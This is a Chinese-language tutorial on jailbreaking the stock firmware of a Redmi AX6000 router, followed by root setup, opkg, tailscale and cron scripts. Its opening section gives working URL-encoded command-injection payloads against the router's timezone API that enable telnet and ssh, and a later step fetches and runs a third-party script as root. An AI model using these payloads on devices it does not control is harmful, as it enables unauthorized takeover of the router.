红米AX6000路由器 官方固件改造

RCE

AX6000 在 1.0.60 之前的固件版本存在(需登录后利用的)任意命令执行漏洞:`set_sys_time` 接口的 `timezone` 参数被直接拼进 shell 命令,因此用 `'` 闭合引号再接 `;` 即可执行任意命令(下面三条 URL 解码后正是这样的 payload)。先登录管理界面,把下面各 URL 中的 **STOK** 替换为登录后地址栏 `;stok=XXXYYY` 里的值。STOK 是会话令牌,不要泄露;请只对自己拥有的设备操作,1.0.60 及以后的版本已修复,这些 URL 不再适用。

  1. 向 crash 分区写入标记(payload 用 dd/printf 拼出几个字节后 `mtd write - crash`)

http://miwifi.com/cgi-bin/luci/;stok=**STOK**/api/misystem/set_sys_time?timezone=%20%27%20%3B%20zz%3D%24%28dd%20if%3D%2Fdev%2Fzero%20bs%3D1%20count%3D2%202%3E%2Fdev%2Fnull%29%20%3B%20printf%20%27%A5%5A%25c%25c%27%20%24zz%20%24zz%20%7C%20mtd%20write%20-%20crash%20%3B%20

  2. 设置 NVRAM:通过 `bdata set` 打开 telnet_en / ssh_en / uart_en 并 commit

http://miwifi.com/cgi-bin/luci/;stok=**STOK**/api/misystem/set_sys_time?timezone=%20%27%20%3B%20bdata%20set%20telnet_en%3D1%20%3B%20bdata%20set%20ssh_en%3D1%20%3B%20bdata%20set%20uart_en%3D1%20%3B%20bdata%20commit%20%3B%20

  3. 重启

http://miwifi.com/cgi-bin/luci/;stok=**STOK**/api/misystem/set_sys_time?timezone=%20%27%20%3b%20reboot%20%3b%20

重启后可以通过 Telnet 登录路由器(Telnet 是明文协议,只应在可信的局域网内临时使用;SSH 可用后建议把 telnet_en 改回 0):

telnet 192.168.31.1

更改密码:

# Set the root password first: it is what the telnet/ssh logins use from now on.
passwd root
# Persist the switches that step 2 turned on, this time through nvram.
# NOTE(review): uart_en and boot_wait=on presumably expose the serial console and
# a bootloader prompt — they widen the physical attack surface and are only
# useful if you actually want serial/U-Boot access; confirm before keeping them.
for flag in ssh_en telnet_en uart_en; do
  nvram set "${flag}=1"
done
nvram set boot_wait=on
nvram commit
# Clear the marker that step 1 wrote into the crash partition.
mtd erase crash
reboot

设置可写根目录

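# Install a boot-time script that makes the root filesystem writable by pivoting
# onto an overlay kept under /data. The heredoc delimiter is quoted so the shell
# writes the file verbatim (no parameter expansion inside it).
tee /data/mount-overlay.sh <<'EOF'
#!/bin/sh /etc/rc.common

START=00

. /lib/functions/preinit.sh

[ -e /data/overlay ] || mkdir /data/overlay
[ -e /data/overlay/upper ] || mkdir /data/overlay/upper
[ -e /data/overlay/work ] || mkdir /data/overlay/work

mount --bind /data/overlay /overlay
fopivot /overlay/upper /overlay/work /rom 1

#Fixup miwifi misc, and DO NOT use /overlay/upper/etc instead, /etc/uci-defaults/* may be already removed
/bin/mount -o noatime,move /rom/data /data 2>&-
/bin/mount -o noatime,move /rom/etc /etc 2>&-
/bin/mount -o noatime,move /rom/ini /ini 2>&-
/bin/mount -o noatime,move /rom/userdisk /userdisk 2>&-
EOF

chmod +x /data/mount-overlay.sh
# Register the script as a firewall "include" so the stock firmware runs it at
# boot. NOTE(review): firewall includes also run when the firewall is reloaded —
# confirm the script is harmless on a second run (the bind mount and fopivot
# above are not guarded against already being in place).
uci set firewall.mount_overlay=include
uci set firewall.mount_overlay.type='script'
uci set firewall.mount_overlay.path='/data/mount-overlay.sh'
uci set firewall.mount_overlay.enabled='1'
uci commit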

临时启动SSH

# Force the `channel` value in the stock dropbear init script to "debug" so the
# SSH daemon is allowed to start. NOTE(review): what `channel` gates is inferred
# from the heading, not verified — read /etc/init.d/dropbear to confirm.
# The heading calls this temporary; the "固化SSH" step below makes it durable.
sed -i -e 's/channel=.*/channel="debug"/' /etc/init.d/dropbear
/etc/init.d/dropbear restart

固化SSH

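# Fetch and run the third-party auto_ssh installer.
# NOTE(review): this executes, as root, a script pulled from the mutable `main`
# branch through a CDN — its content can change at any time. Pin the ref to a
# commit SHA (…/AX6S@<sha>/auto_ssh.sh) and read the script before running it.
# The subshell with set -e stops at the first failure and does not leave the
# interactive session in /data/auto_ssh; -f makes curl fail on an HTTP error
# instead of saving an error page under the script's name.
(
  set -e
  mkdir -p /data/auto_ssh
  cd /data/auto_ssh
  curl -fO https://fastly.jsdelivr.net/gh/lemoeo/AX6S@main/auto_ssh.sh
  chmod +x auto_ssh.sh
  sh auto_ssh.sh install
)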

设置时区

# Set the system time zone (CST-8, China Standard Time) on the first system
# section, including the two Xiaomi-specific web/index variants, then commit.
for kv in timezone=CST-8 webtimezone=CST-8 timezoneindex=2.84; do
  uci set "system.@system[0].${kv}"
done
uci commit

配置IPv6

# IPv6: put the LAN side into relay mode for DHCPv6, RA and NDP.
uci set dhcp.lan.dhcpv6='relay'
uci set dhcp.lan.ra='relay'
uci set dhcp.lan.ndp='relay'
uci set dhcp.lan.leasetime='720m'
uci set dhcp.lan.ra_maxinterval='20'
# Do not serve DHCP on the wan section itself.
uci set dhcp.wan.ignore='1'
# Create the wan_6 section before setting its options (uci needs the section
# to exist first — keep this line ahead of the ones below).
uci set dhcp.wan_6=dhcp
uci set dhcp.wan_6.interface='wan'
uci set dhcp.wan_6.dhcpv6='relay'
uci set dhcp.wan_6.ra='relay'
uci set dhcp.wan_6.ndp='relay'
# master=1 marks wan_6 as the upstream side for the relaying lan section
# (odhcpd semantics — confirm against its documentation).
uci set dhcp.wan_6.master='1'
uci commit

设置定时脚本(crontab 条目,每天 09:00 执行;注意这里写的是 eletribot.sh,而下文脚本内部用的名字是 electribot.sh,请与实际文件名保持一致):

0 9 * * * test -x /data/eletribot.sh && /data/eletribot.sh >/dev/null 2>&1

配置OPKG

# Point opkg at the OpenWrt 18.06.9 aarch64_cortex-a53 feeds on the TUNA mirror.
# NOTE(review): the feeds are fetched over plain http. The same mirror is used
# over https further down (the libopenssl download), so try https here —
# TODO confirm opkg on this firmware can fetch https. Until then, package
# integrity rests entirely on opkg's feed signature verification; check that it
# is actually enabled in /etc/opkg.conf rather than assuming it.
tee /etc/opkg/distfeeds.conf <<EOF
src/gz openwrt_core http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.9/packages/aarch64_cortex-a53/packages
src/gz openwrt_base http://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.9/packages/aarch64_cortex-a53/base
EOF

# Declare the architectures opkg may install for (higher number = preferred).
tee -a /etc/opkg.conf <<EOF
arch all 100
arch aarch64_cortex-a53 200
EOF

opkg update

安装Python

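opkg install python3-pip

# openssl won't work out-of-the-box: fetch the libopenssl ipk from the same feed
# and copy its shared objects into /usr/lib by hand. opkg does not track files
# installed this way, so they are never upgraded by `opkg upgrade`.
# NOTE(review): the OpenSSL 1.0.2 line is long out of upstream support — do not
# rely on it for anything security-sensitive (TODO: check whether a newer
# package is usable on this firmware). Also check that the final cp does not
# overwrite libraries the stock firmware already ships.
# The subshell with set -e stops at the first failure and keeps the interactive
# session's cwd; -f makes curl fail on an HTTP error instead of saving an error
# page as the .ipk.
(
  set -e
  cd /tmp
  curl -fO https://mirrors.tuna.tsinghua.edu.cn/openwrt/releases/18.06.9/packages/aarch64_cortex-a53/base/libopenssl_1.0.2u-1_aarch64_cortex-a53.ipk
  # an .ipk is a tar.gz wrapping control.tar.gz + data.tar.gz
  tar zxpvf libopenssl_1.0.2u-1_aarch64_cortex-a53.ipk
  tar -xvf data.tar.gz
  cd ./usr/lib/
  cp libcrypto.so.1.0.0 libssl.so.1.0.0 /usr/lib/
)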
#!/bin/sh
### To run this script every day ###
# (crontab -l 2>/dev/null; echo "9 0 * * * /path/to/electribot.sh") | crontab -
#   ('crontab -e' opens an editor and ignores stdin; 'crontab -' reads the new
#    table from stdin, and listing the old one first keeps existing entries)
####################################
# capture: http://www.cpcelc.pku.edu.cn/phone/socket.php?apistr=XXXXX
# Account identifier sent with every meter query; captured from the phone
# client's request (see the capture note above). Treat it as a credential.
OPERID="oF_bbccddeeffeeddssaa"
# Reading Log (one "<timestamp> <reading>" line per run).
# NOTE: /tmp is usually volatile on a router, so the history is lost on reboot
# — move it under /data if the last-three-readings message should survive one.
READING_LOG="/tmp/electribot.log"
# Remaining-kWh value at or below which the "charge soon" title is used.
LOW_THRESHOLD=20
# Serverchan sendkey https://sct.ftqq.com/
# NOTE(review): the sendkey is a bearer secret — keep the real value out of a
# public gist (read it from a 0600 file under /data or from the environment).
SCKEY="SCT88776655443322110099887766"
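get_reading() {
  # Query the campus meter API for the current reading and print it rounded to
  # an integer. Returns 1 (printing nothing on stdout) when no value is found.
  # Fix: the failure message now goes to stderr. Before, it went to stdout and a
  # caller doing READING=$(get_reading) captured "Failed to get reading" as the
  # reading itself, so the caller's empty-string check never fired.
  # NOTE(review): the request is plain http with OPERID in the query string,
  # so both are visible to anyone on the path. The regex requires a decimal
  # point, so an integer-only response yields no reading — TODO confirm the
  # API always returns a fraction.
  local payload value
  payload=$(printf 'apistr={"operType":"BGRJ2018_CXDBSY_BY","operFlag":300023,"OperID":"%s"}' "$OPERID")
  value=$(curl -Gs http://www.cpcelc.pku.edu.cn/phone/socket.php \
    --data-urlencode "$payload" \
    | grep -oE "([0-9]{1,3}\.)[0-9]{1,3}" \
    | head -n 1)
  if [ -z "$value" ]; then
    echo "Failed to get reading" >&2
    return 1
  fi
  # %.0f rounds to the nearest whole unit
  printf "%.0f" "$value"
}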
get_date() {
  # Timestamp for log lines, e.g. "2023-09-12 17:05:00", in the router's local time.
  local fmt='+%Y-%m-%d %H:%M:%S'
  date "$fmt"
}
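send_sc_message() {
  # Push a notification through ServerChan. $1 = title, $2 = body ("desp").
  # Returns 1 when either argument is empty; otherwise curl's exit status, which
  # with -f is also non-zero on an HTTP error response.
  if [ -z "$1" ] || [ -z "$2" ]; then
    # diagnostics to stderr; the labels used to be swapped ($1 is the title)
    echo "Missing title or message: title=$1 message=$2" >&2
    return 1
  fi
  # Fix: the original combined -G (put the fields in the query string) with
  # -X POST and a form Content-Type, i.e. a body-less POST carrying the data in
  # the URL. --data-urlencode already implies a POST with a form body, so -G
  # and -X are dropped. -sS keeps output quiet but still reports errors.
  # Note the sendkey is a bearer secret embedded in the URL by the API's design:
  # it shows up in `ps` and in any proxy/CDN log of this request.
  curl -sS -f "https://sc.ftqq.com/$SCKEY.send" \
    -H 'Content-Type: application/x-www-form-urlencoded' \
    --data-urlencode "$(printf 'title=%s' "$1")" \
    --data-urlencode "$(printf 'desp=%s' "$2")"
}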
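# Main flow: fetch the reading, validate it, append it to the log, then build a
# title/message pair and print it.
# NOTE(review): send_sc_message is defined above but never called in the visible
# script — it only echoes; presumably the send call was cut from this listing.
READING=$(get_reading)
# Fix: validate BEFORE logging, and accept only a plain integer. The old code
# logged first and then tested for an empty string, which missed the case where
# get_reading printed its error message to stdout (the message was captured
# into READING and later fed to -lt).
case "$READING" in
  ''|*[!0-9]*)
    echo "Failed to get reading" >&2
    exit 1
    ;;
esac
echo "Current reading: $READING"
echo "$(get_date) $READING" >> "$READING_LOG"
TITLE=$(printf '电量剩余%s度' "$READING")
# The >> above already created the log, so the else branch below is effectively
# unreachable; kept for safety.
if [ -f "$READING_LOG" ]; then
  MESSAGE="最近三次读数: $(tail -n 3 "$READING_LOG")"
else
  touch "$READING_LOG"
  MESSAGE="没有近期记录"
fi
if [ "$READING" -lt "$LOW_THRESHOLD" ]; then
  TITLE="【尽快充电】$TITLE"
  MESSAGE="购电:http://www.cpcelc.pku.edu.cn/phone/mainpage.php
$MESSAGE"
fi
echo "$TITLE" "$MESSAGE"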
#!/bin/sh /etc/rc.common
# Copyright (C) 2009-2011 OpenWrt.org
# procd init script for tailscaled: starts late in boot, under procd supervision.
START=90
USE_PROCD=1
# tailscale settings
# Passed to tailscaled as --port.
PORT="41641"
# Architecture and release used to build the download URL in download().
# Bumping VERSION changes what gets fetched on the next boot where the binary
# is missing.
ARCH="arm64"
VERSION="1.48.2"
# Extra tailscaled flags; deliberately expanded unquoted in start_service so
# several space-separated flags can be given here.
FLAGS=""
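download() {
  # Fetch the pinned tailscale release tarball and expose its two binaries via
  # symlinks in /usr/sbin. The extracted tree lives under /tmp (usually volatile
  # on a router), which is why start_service re-downloads when the link target
  # is gone. Returns 1 on a failed download or extraction.
  # NOTE(review): nothing verifies the download beyond TLS — no checksum or
  # signature check before a root-run daemon is installed. If the publisher
  # offers a checksum for this tarball, fetch it and compare before extracting.
  local archive=/tmp/tailscale.tar.gz
  local tree="/tmp/tailscale_${VERSION}_${ARCH}"
  # -f: an HTTP error must fail here rather than save an error page as the tarball
  curl -fL -o "$archive" "https://pkgs.tailscale.com/stable/tailscale_${VERSION}_${ARCH}.tgz" || return 1
  if ! tar -C /tmp -xzf "$archive"; then
    rm -f "$archive"
    return 1
  fi
  # -f: replace a stale (dangling) link left over from a previous boot
  ln -sf "$tree/tailscaled" /usr/sbin/tailscaled
  ln -sf "$tree/tailscale" /usr/sbin/tailscale
  # remove archive
  rm -f "$archive"
}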
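start_service() {
  # Ensure the binary is present (re-downloading after a reboot cleared /tmp),
  # then hand tailscaled to procd with its state kept on persistent /data.
  # Fix: a failed download used to fall through and register a procd instance
  # for a binary that does not exist; now the service start is aborted.
  if [ ! -f /usr/sbin/tailscaled ]; then
    download || return 1
  fi
  procd_open_instance
  # NOTE(review): the state file presumably holds the node's private key —
  # keep /data/etc readable by root only. ${FLAGS} is intentionally unquoted
  # so that several space-separated flags can be supplied.
  procd_set_param command /usr/sbin/tailscaled --state=/data/etc/tailscaled.state --port="${PORT}" ${FLAGS}
  procd_set_param stdout 1
  procd_set_param stderr 1
  procd_close_instance
}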
stop_service() {
  # Run tailscaled's own cleanup on stop. The path is a symlink into /tmp (see
  # download), so this can fail if the target is gone after a reboot.
  local bin=/usr/sbin/tailscaled
  "$bin" --cleanup
}
#!/bin/sh
# Directory holding the user's own init scripts; in "all" mode every file here
# is made executable, linked into /etc/init.d, enabled and started (as root).
BASE_DIR=/data/etc/init.d
# Abort on the first failing command (not honoured inside if/&&/|| tests).
set -e
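remove_firewall_script(){
  # Unregister the firewall include named $1; no-op if it does not exist.
  # Fix: the delete is now committed — add_firewall_script commits, but this
  # function left the deletion staged, so it never persisted.
  # NOTE(review): nothing in the visible script calls this function.
  if [ -z "$(uci -q get "firewall.${1}")" ]; then
    return
  fi
  echo "remove firewall.${1}"
  uci delete "firewall.${1}"
  uci commit firewall
}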
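add_firewall_script(){
  # Register file $2 as a firewall include script named $1 and commit.
  # Prints a message and returns 0 when the file is missing or the include
  # already exists. Fix: all expansions are quoted so paths with spaces work and
  # the existence test is a real string test instead of an accident of [ ].
  if [ ! -f "${2}" ]; then
    echo "file ${2} not exists"
    return
  fi
  if [ -n "$(uci -q get "firewall.${1}")" ]; then
    echo "firewall.${1} already exists"
    return
  fi
  echo "add firewall.${1} ${2}"
  uci set "firewall.${1}=include"
  uci set "firewall.${1}.type=script"
  uci set "firewall.${1}.path=${2}"
  uci set "firewall.${1}.enabled=1"
  uci commit firewall
}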
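remove_init_script(){
  # Disable, stop and unlink the /etc/init.d entry named $1. The entry is the
  # symlink created by add_init_script, so rm removes the link, not the file
  # under BASE_DIR. With set -e active a failing disable/stop aborts before rm.
  # Fix: expansions are quoted so names with spaces cannot split the command.
  if [ ! -f "/etc/init.d/${1}" ]; then
    echo "service ${1} not exists"
    return
  fi
  echo "remove /etc/init.d/${1}"
  "/etc/init.d/${1}" disable
  "/etc/init.d/${1}" stop
  rm "/etc/init.d/${1}"
}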
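add_init_script(){
  # Link file $2 into /etc/init.d as $1, make it executable, enable and start it.
  # Prints a message and returns 0 when the file is missing or the service name
  # is already taken. Fix: expansions are quoted so paths with spaces work.
  # NOTE(review): whatever lands here runs as root at boot — keep BASE_DIR and
  # its files root-owned and not writable by others.
  if [ ! -f "${2}" ]; then
    echo "file ${2} not exists"
    return
  fi
  if [ -f "/etc/init.d/${1}" ]; then
    echo "service ${1} already exists"
    return
  fi
  echo "add /etc/init.d/${1} ${2}"
  ln -sf "${2}" "/etc/init.d/${1}"
  # chmod follows the symlink, so this marks the target under BASE_DIR executable
  chmod +x "/etc/init.d/${1}"
  "/etc/init.d/${1}" enable
  "/etc/init.d/${1}" start
}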
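# Modes: no args -> register this script as a firewall include and link+start
# every file in BASE_DIR; "--remove" -> unlink them all; "--remove FILE" ->
# unlink one; "FILE" -> link+start one.
FLAG_ALL=0
FLAG_REMOVE=0
TARGET=""
if [ $# -eq 0 ]; then
  FLAG_ALL=1
elif [ $# -eq 1 ] && [ "$1" = "--remove" ]; then
  FLAG_ALL=1
  FLAG_REMOVE=1
elif [ $# -eq 2 ] && [ "$1" = "--remove" ]; then
  FLAG_REMOVE=1
  # Fix: the file is $2 here; the old code later ran basename on "$1", i.e. on
  # the literal "--remove", so single-file removal never worked.
  TARGET=$2
else
  TARGET=$1
fi
if [ $FLAG_ALL -eq 0 ]; then
  # Single-file mode: the service name is the file name minus its extension.
  NAME=$(basename "$TARGET" | cut -d. -f1)
  FULL_PATH=$(readlink -f "$TARGET")
  if [ $FLAG_REMOVE -eq 1 ]; then
    remove_init_script "$NAME"
  else
    add_init_script "$NAME" "$FULL_PATH"
  fi
else
  # Register this script itself as a firewall include so it runs at boot.
  # NOTE(review): firewall includes run again on every firewall reload, and
  # everything under BASE_DIR is made executable, linked into /etc/init.d and
  # started as root — treat that directory as a privileged persistence point
  # (root-owned, not group/world-writable).
  NAME="zinit"
  FULL_PATH=$(readlink -f "$0")
  add_firewall_script "$NAME" "$FULL_PATH"
  # Glob instead of parsing ls; skip the literal pattern when the dir is empty.
  for FILE in "$BASE_DIR"/*; do
    [ -e "$FILE" ] || continue
    chmod -R +x "$FILE"
    # Unlike single-file mode the extension is kept here — TODO confirm this is
    # intended (files in BASE_DIR are presumably extension-less).
    NAME=$(basename "$FILE")
    FULL_PATH=$(readlink -f "$FILE")
    if [ $FLAG_REMOVE -eq 1 ]; then
      remove_init_script "$NAME"
    else
      add_init_script "$NAME" "$FULL_PATH"
    fi
  done
fi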